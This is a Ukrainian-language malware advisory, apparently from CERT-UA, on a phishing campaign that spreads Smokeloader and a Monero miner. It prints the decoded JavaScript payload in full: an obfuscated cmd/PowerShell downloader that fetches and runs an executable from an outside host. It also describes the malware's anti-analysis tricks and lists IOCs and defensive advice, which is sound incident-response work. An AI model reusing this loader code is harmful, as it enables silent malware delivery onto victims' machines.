Поширення Monero Mining, через Smokeloader

Виявлено факт поширення шкідливого програмного забезпечення Smokeloader, який скачував на комп’ютери жертв програму для майнингу криптовалюти Monero.

Поширення Smokeloader відбувається через розсилку поштових повідомлень зі злоякісним Javascript-ом.

В самому Javascript шкідливий код зашифрований в виді Base64 і при розшифруванні виглядає так:

cmd /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3%

$http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObjectADODB.Stream; $path = $env:temp + ‘\1964.exe’; $http_request.open(‘GET’, ‘http://enterwords.ru/uadoc/crsse.exe’, $false);

$http_request.send();if($http_request.Status -eq”200″) {$adodb.open();$adodb.type = 1;$adodb.write($http_request.responseBody);

$adodb.position = 0;$adodb.savetofile($path); $adodb.close();}else{   Write-Host $http_request.statusText; }Start-Process $path;

 Він скачує з сайту hXXp://enterwords.ru/uadoc/crsse.exe файл crsse.exe і зберігає його в директорії C:\tmp\1964.exe. Така назва файлу вибрана навмисно, щоб користувач міг сплутати її з процесом csrss.exe (Client/Server Runtime Subsystem).

 Crsse.exe це шкідливе програмне забезпечення забезпечення типу Smokeloader. Для унеможливлення його аналізу він має техніки приховування і анти-аналізу. В crsse.exe є безліч непотрібних функцій, які заважають аналізу. Серед них в crsse.exe виділяється пам’ять і записується туди тіло вірусу, куди переходить виконання, проте без заголовка, щоб не можна було його динамічно проаналізувати.

Перехід виконання в іншу область пам’яті:

 Далі Smokeloader запускає потік, який перевіряє на наявність запущених програм, які використовуються для аналізу шкідливого коду. Якщо вони присутні, він закриває їх. Також, в регістрі (System\\CurrentControlSet\\Services\\ Disk\\Enum) перевіряє чи дана система запущена в віртуальному середовищі і якщо так, то програма переходить до безкінечного циклу сну.

 Після цього запускається та інфікується, шкідливим кодом, процес explorer.exe. Він скачує з hXXp://parodadoca.ru/panel/mr/curl.exe файл curl.exe, який є програмою для майнингу криптовалюти Monero. Файл зберігається в директорії: C:\Users\Ім’яКористувача\AppData\Roaming\MicroMon\curl.exe.

 Перелік індикаторів компрометації:

MD5 / Назви файлів:
b7a59f6868623e0a95eb58a0d09f4810 curl.exe

d7c21ada5b5325e52295a331c6fb53a4 Заявка.js

2c575c6037d4aa5f74a239d6ebf4d381 crsse.exe

Шкідливі файли, які створюються:

C:\Users\Ім’я Користувача\AppData\Roaming\MicroMon\curl.exe

C:\tmp\1964.exe

Шкідливі посилання (Malicious Links):

hXXp://parodadoca.ru/panel/mr/curl.exe

hXXp://enterwords.ru/uadoc/crsse.exe

Корисні посилання:

https://www.virustotal.com/#/file/fc9a32ecce00b4b2d711fe9bda120c9f82f3c2405f3658d30f4dbdac5cedde26/detection

https://www.virustotal.com/#/file/d615b44faf43961120df348e687e7f237ca67c4a1050c8d5bdf344495ab26f30/detection

https://www.virustotal.com/#/file/0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42/detection

 Рекомендації CERT—UA:

  1. Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви, наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).

  2. Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштовогой веб-трафіку.

  3. Перевірити наявність отриманих повідомлень клієнтів поштового серверу, для визначення потенційно вражених користувачів.

  4. Перевірити наявність переходів за посиланнями, які містили шкідливі файли, для визначення потенційно вражених користувачів.

  5. Провести заходи з виявлення та видалення ШПЗ.

  6. Оновити антивірусну базу та просканувати потенційно заражені системи.

0

Автор публікації

Офлайн 4 тижні

Ihor Romanets

0
Коментарі: 0Публікації: 203Реєстрація: 02-10-2017